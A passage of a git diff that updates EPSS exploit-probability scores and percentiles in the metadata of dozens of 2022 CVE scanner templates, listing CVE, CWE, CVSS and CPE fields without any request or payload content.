a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 33237a4c22..141ffa89fb 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30513 cwe-id: CWE-79 - epss-score: 0.00111 - epss-percentile: 0.43984 + epss-score: 0.00097 + epss-percentile: 0.40092 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 3c3ce6f35f..125bddaf4e 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30514 cwe-id: CWE-79 - epss-score: 0.00111 - epss-percentile: 0.43984 + epss-score: 0.00097 + epss-percentile: 0.40092 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index ab4ed10718..19235158ce 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97447 - epss-percentile: 0.99944 + epss-score: 0.97465 + epss-percentile: 0.99956 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 4f665fbc8b..d0e9bf7afd 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-3062 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45778 + epss-percentile: 0.45893 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 04ea9627d5..6b85abb630 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30776 cwe-id: CWE-79 epss-score: 0.00112 - epss-percentile: 0.44409 + epss-percentile: 0.44504 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 8ae62b9f67..09ec00d191 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00087 - epss-percentile: 0.36073 + epss-percentile: 0.36061 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index eda5c4e739..674cb1489e 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31126 cwe-id: CWE-74 - epss-score: 0.82236 - epss-percentile: 0.98089 + epss-score: 0.85491 + epss-percentile: 0.98274 cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 88f5279ab8..af08e10e37 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31268 cwe-id: CWE-22 - epss-score: 0.00606 - epss-percentile: 0.76133 + epss-score: 0.00618 + epss-percentile: 0.76513 cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 9be0d5cc32..c1ac6eecec 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-31269 cwe-id: CWE-798 epss-score: 0.00174 - epss-percentile: 0.54361 + epss-percentile: 0.54513 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index ca6c01bdc5..74115184fd 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 - epss-score: 0.00275 - epss-percentile: 0.64565 + epss-score: 0.00209 + epss-percentile: 0.58814 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 934fb62a7f..7803afb3f0 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31373 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.45342 + epss-score: 0.00088 + epss-percentile: 0.36947 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 93e4c16c77..15b760bf4f 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-3142 cwe-id: CWE-89 epss-score: 0.00318 - epss-percentile: 0.67135 + epss-percentile: 0.67316 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 803e0761bb..cef3b50c12 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31474 cwe-id: CWE-22 - epss-score: 0.00437 - epss-percentile: 0.71862 + epss-score: 0.00531 + epss-percentile: 0.74566 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index bdbef3fe68..0bf7279398 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31499 cwe-id: CWE-78 - epss-score: 0.30071 - epss-percentile: 0.96468 + epss-score: 0.50608 + epss-percentile: 0.97247 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 65f1df65a0..de37889f85 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 - epss-score: 0.88737 - epss-percentile: 0.98418 + epss-score: 0.85158 + epss-percentile: 0.98258 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index d38c08f056..4e2f91eb3d 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31798 cwe-id: CWE-384 epss-score: 0.0012 - epss-percentile: 0.45974 + epss-percentile: 0.46084 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index cb3a5fd266..4b27ca73ac 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31814 cwe-id: CWE-78 - epss-score: 0.96673 - epss-percentile: 0.99549 + epss-score: 0.96552 + epss-percentile: 0.9952 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 242591a7f4..750084b249 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31845 cwe-id: CWE-668 - epss-score: 0.00833 - epss-percentile: 0.80048 + epss-score: 0.00874 + epss-percentile: 0.80606 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index df0fc5fae5..11be23bb96 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31846 cwe-id: CWE-668 - epss-score: 0.00833 - epss-percentile: 0.80048 + epss-score: 0.00874 + epss-percentile: 0.80606 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 307005f87e..fdcf2b5506 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31847 cwe-id: CWE-425 - epss-score: 0.01086 - epss-percentile: 0.82641 + epss-score: 0.01285 + epss-percentile: 0.84308 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 807de2fc52..6fb930af01 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-31854 cwe-id: CWE-434 epss-score: 0.08519 - epss-percentile: 0.93799 + epss-percentile: 0.93839 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index c788625652..6ac481ef9c 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.05592 - epss-percentile: 0.92468 + epss-score: 0.05519 + epss-percentile: 0.9247 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 224c6995d6..134253cd3a 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31974 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 8e9db2d565..3b270623bb 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31975 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index f44a43b6cb..9a8b90ca3f 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.01261 - epss-percentile: 0.84048 + epss-score: 0.01192 + epss-percentile: 0.83594 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 822e5d29b8..af4d03f9de 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01261 - epss-percentile: 0.84048 + epss-score: 0.01192 + epss-percentile: 0.83594 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index c9a5c31b74..fdc13d8ea7 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31978 cwe-id: CWE-89 - epss-score: 0.01261 - epss-percentile: 0.84048 + epss-score: 0.01192 + epss-percentile: 0.83594 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index 1f6ffefd1c..4907172976 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31980 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 2d1bbf94bd..7e547d58e9 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 7744add0ee..2558c9532f 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31982 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index aed4df923c..8ae7e3583b 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index cc143f010b..fea5061a76 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index ffaddeeefb..8e2ca3cf43 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32007 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index bafd0d090e..ff6d6794c5 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index a04001ac88..c65c42750a 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32018 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index e7590d62ab..10b7a67f5f 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32022 cwe-id: CWE-89 - epss-score: 0.00879 - epss-percentile: 0.80585 + epss-score: 0.00897 + epss-percentile: 0.80882 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index b01ecb2a52..06d6a65351 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32024 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 96c1791712..f76f4c04b6 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 21384399a8..58dfb1a590 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32026 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 83e9383fda..e68f35c6bf 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 - epss-score: 0.00817 - epss-percentile: 0.7985 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 61a8c3650d..c563b27c4e 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 - epss-score: 0.00942 - epss-percentile: 0.81286 + epss-score: 0.01261 + epss-percentile: 0.84139 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 741ac214b3..de442d2a42 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32195 cwe-id: CWE-79 - epss-score: 0.0013 - epss-percentile: 0.47529 + epss-score: 0.00112 + epss-percentile: 0.44504 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index b91fd54e26..dcd2988e5f 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32409 cwe-id: CWE-22 - epss-score: 0.65448 - epss-percentile: 0.97585 + epss-score: 0.59439 + epss-percentile: 0.97459 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 5f96993209..312a76fd9a 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3242 - cwe-id: CWE-94,CWE-79 + cwe-id: CWE-79,CWE-94 epss-score: 0.02392 - epss-percentile: 0.88709 + epss-percentile: 0.88773 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 230e81c3ae..2b0f375ded 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 - epss-score: 0.0395 - epss-percentile: 0.91054 + epss-score: 0.0549 + epss-percentile: 0.92452 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 644b2869d0..13f343107c 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - epss-score: 0.00351 - epss-percentile: 0.68745 + epss-score: 0.00237 + epss-percentile: 0.61804 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 460874eb38..117fe18cc8 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32770 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41513 + epss-percentile: 0.41592 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 71d746c121..5238ca1381 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.00056 - epss-percentile: 0.2114 + epss-percentile: 0.21026 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index f662fa2ea0..9836831bdf 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-32772 cwe-id: CWE-79 epss-score: 0.00056 - epss-percentile: 0.2114 + epss-percentile: 0.21026 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 3f7b5cca2c..fd2655cf09 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.03708 - epss-percentile: 0.90783 + epss-score: 0.02148 + epss-percentile: 0.8813 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index e7b34e00e7..7d3e1d1b94 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 - epss-score: 0.00597 - epss-percentile: 0.7595 + epss-score: 0.00593 + epss-percentile: 0.7598 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 971a280609..567dd530bc 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-33891 cwe-id: CWE-78 - epss-score: 0.96491 - epss-percentile: 0.99477 + epss-score: 0.96956 + epss-percentile: 0.99671 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 5bf3586519..61c05c5f19 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33901 - epss-score: 0.00812 - epss-percentile: 0.79787 + epss-score: 0.00701 + epss-percentile: 0.78159 cpe: 